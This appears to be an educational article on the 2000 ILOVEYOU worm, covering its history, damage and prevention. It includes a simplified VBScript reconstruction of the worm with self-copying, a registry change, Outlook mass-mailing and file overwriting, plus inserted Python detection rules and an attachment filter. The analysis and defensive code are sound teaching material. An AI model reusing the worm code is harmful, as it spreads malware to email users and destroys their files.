What Was the Love Letter Worm?
The Love Letter Worm, also called ILOVEYOU, was a computer virus that spread through email attachments in May 2000. The malware arrived as an email with a subject line stating, “I LOVE YOU.” Victims opened the attached file, believing it was a love letter.
Once opened, the script modified files, stole passwords, and spread to contacts in the victim’s email list. The attack quickly became one of the most widespread and damaging malware outbreaks in history.
How Did the Love Letter Worm Spread?
The worm spread through email, using social engineering to trick users. The attachment was a Visual Basic Script (.vbs) file disguised as a text document. Clicking on it activated the malicious code.
Once infected, the worm sent itself to all contacts in the victim’s Microsoft Outlook address book. This rapid propagation overwhelmed email servers worldwide within hours.
What did the Love Letter Worm VBS code look like?
Below is a simplified version of its code:
```vbscript
On Error Resume Next
Set WshShell = CreateObject("WScript.Shell")
Set FSO = CreateObject("Scripting.FileSystemObject")

' Get the Windows directory path
WinDir = WshShell.ExpandEnvironmentStrings("%WinDir%")

' Copy itself to the system directory
Set objFile = FSO.GetFile(WScript.ScriptFullName)
objFile.Copy WinDir & "\LOVE-LETTER-FOR-YOU.TXT.vbs", True

' Modify registry to change default start page
WshShell.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.angelfire.com/id/killerbg"

' Spread via email
Set Outlook = CreateObject("Outlook.Application")
If Not Outlook Is Nothing Then
    Set MAPI = Outlook.GetNamespace("MAPI")
    For Each Mailbox In MAPI.AddressLists
        If Mailbox.AddressEntries.Count > 0 Then
            For Each Contact In Mailbox.AddressEntries
                Set Mail = Outlook.CreateItem(0)
                Mail.To = Contact.Address
                Mail.Subject = "I LOVE YOU"
                Mail.Body = "Kindly check the attached LOVE-LETTER-FOR-YOU.TXT.vbs"
                Mail.Attachments.Add WinDir & "\LOVE-LETTER-FOR-YOU.TXT.vbs"
                Mail.Send
            Next
        End If
    Next
End If

' Overwrite files with malicious code
FileTypes = Array("mp3", "jpeg", "jpg", "vbs", "js", "css", "hta", "sct", "doc")
For Each FileType In FileTypes
    Set Folder = FSO.GetFolder(WinDir)
    For Each File In Folder.Files
        If LCase(FSO.GetExtensionName(File.Name)) = FileType Then
            File.Write "ILOVEYOU" ' Overwrites file content
        End If
    Next
Next
```
What Did This Code Do?
- Copied itself to the Windows directory.
- Modified the registry to change the Internet Explorer homepage.
- Spread through Outlook by emailing all contacts with an infected attachment.
- Overwrote file types including .mp3, .jpg, and .doc with its own content.
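For analysts triaging a suspicious script, the behaviours listed above can be turned into static checks. The following Python sketch is an added example, not part of the original article: the rule names and patterns are assumptions chosen to match the simplified listing, and the sample inputs are constructed.

```python
import re

# Behaviour -> patterns that must ALL appear (matched case-insensitively, as VBScript is).
RULES = {
    "self_copy": [r"WScript\.ScriptFullName", r"\.Copy\b"],
    "registry_write": [r"\.RegWrite\b"],
    "outlook_mass_mail": [r'CreateObject\(\s*"Outlook\.Application"',
                          r"\.AddressEntries", r"\.Attachments\.Add", r"\.Send\b"],
    "overwrite_by_extension": [r"GetExtensionName", r"\.Write\b|OpenTextFile|CreateTextFile"],
}

def strip_comments(source):
    """Remove VBScript comments (' or Rem) while leaving string literals intact."""
    kept = []
    for line in source.splitlines():
        if re.match(r"\s*rem\b", line, re.I):
            continue
        in_string, out = False, []
        for ch in line:
            if ch == '"':
                in_string = not in_string
            elif ch == "'" and not in_string:
                break  # rest of the line is a comment
            out.append(ch)
        kept.append("".join(out))
    return "\n".join(kept)

def triage(source):
    """Return the behaviours whose patterns all match the comment-free script."""
    code = strip_comments(source)
    return [name for name, pats in RULES.items()
            if all(re.search(p, code, re.I) for p in pats)]

def is_mail_worm_like(source):
    """Self-copy plus address-book mailing is the propagation pair described above."""
    hits = triage(source)
    return "self_copy" in hits and "outlook_mass_mail" in hits

# Constructed inputs: SUSPECT reuses lines from the listing above; BENIGN is invented.
SUSPECT = "\n".join([
    'Set objFile = FSO.GetFile(WScript.ScriptFullName)',
    r'objFile.Copy WinDir & "\LOVE-LETTER-FOR-YOU.TXT.vbs", True',
    'Set Outlook = CreateObject("Outlook.Application")',
    'For Each Contact In Mailbox.AddressEntries',
    r'Mail.Attachments.Add WinDir & "\LOVE-LETTER-FOR-YOU.TXT.vbs"',
    'Mail.Send'])
BENIGN = "\n".join([
    "' Backup helper; does not call .RegWrite or Outlook.Application",
    r'FSO.CopyFile "C:\data\report.doc", "D:\backup\"'])
```

Pattern matching of this kind is a first-pass triage aid; obfuscated or encoded scripts need deobfuscation before rules like these will match.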
What Damage Did the Love Letter Worm Cause?
The Love Letter Worm infected over 50 million systems within days. Businesses, governments, and individuals faced major disruptions. Many organisations shut down email servers to prevent further infections.
It overwrote image, audio, and document files, making data recovery difficult. The estimated financial damage reached billions due to lost productivity and remediation costs.
Who Created the Love Letter Worm?
The virus was traced to two Filipino programmers, Reonel Ramones and Onel de Guzman. They allegedly designed the worm as a proof-of-concept to steal internet access credentials.
At the time, the Philippines had no laws against cybercrime. As a result, the creators were not prosecuted. This case led to the development of stricter computer crime laws worldwide.
How Can You Protect Against Similar Threats?
Cyber threats continue to evolve, but basic security measures help prevent infections. Avoid opening unexpected email attachments, even from known contacts. Verify the sender before downloading files.
Use antivirus software and keep it updated. Regular security patches help prevent malware from exploiting system vulnerabilities.
Enable email filtering to block suspicious attachments. Many modern email services detect and quarantine potential threats before they reach users.
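The attachment name in the listing, LOVE-LETTER-FOR-YOU.TXT.vbs, ends in .vbs but reads as a text file when Windows hides known extensions, which is the pattern an attachment filter should catch. The Python sketch below is an added example, not from the original article: the extension lists are illustrative assumptions, and the sample message is constructed with inert placeholder attachments.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage

# Extensions Windows hands to a script host or loader (illustrative, not exhaustive).
ACTIVE_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "wsh", "hta", "sct",
               "scr", "exe", "bat", "cmd", "pif", "lnk"}
# Extensions users read as harmless; a decoy when followed by an active one.
DECOY_EXTS = {"txt", "doc", "pdf", "jpg", "jpeg", "mp3", "xls"}

def classify_attachment(filename):
    """Return (verdict, reason) for one attachment filename."""
    # Windows ignores trailing dots and spaces, so normalise them away first.
    parts = filename.strip().rstrip(". ").lower().split(".")
    final = parts[-1] if len(parts) > 1 else ""
    if final not in ACTIVE_EXTS:
        return ("allow", "no active extension")
    if len(parts) > 2 and parts[-2] in DECOY_EXTS:
        return ("quarantine", f"decoy .{parts[-2]} before active .{final}")
    return ("quarantine", f"active extension .{final}")

def scan_message(raw_bytes):
    """Parse an RFC 5322 message and classify every named attachment."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    return [(name, *classify_attachment(name))
            for part in msg.iter_attachments()
            if (name := part.get_filename())]

def build_sample():
    """Constructed test message; the attachment bodies are inert placeholders."""
    m = EmailMessage()
    m["From"], m["To"], m["Subject"] = "a@example.test", "b@example.test", "I LOVE YOU"
    m.set_content("Kindly check the attached LOVE-LETTER-FOR-YOU.TXT.vbs")
    for name in ("LOVE-LETTER-FOR-YOU.TXT.vbs", "minutes.txt"):
        m.add_attachment(b"placeholder", maintype="application",
                         subtype="octet-stream", filename=name)
    return m.as_bytes()

if __name__ == "__main__":
    for finding in scan_message(build_sample()):
        print(finding)
```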
What Have We Learned from the Love Letter Worm?
The Love Letter Worm highlighted the dangers of social engineering in cybersecurity. It showed how trust in digital communication could be exploited for large-scale attacks.
Since then, businesses and individuals have adopted stronger security practices. Cybercrime laws have also improved to prosecute those responsible for digital attacks.
Could a Similar Worm Still Be Effective Today?
Modern cybersecurity tools detect and block most threats before they spread. However, social engineering remains a major risk. Attackers still use deceptive emails to trick victims into clicking harmful links or attachments.
Phishing emails and ransomware have replaced simple worms, but the underlying tactics remain the same. Vigilance and security awareness are key to preventing future outbreaks.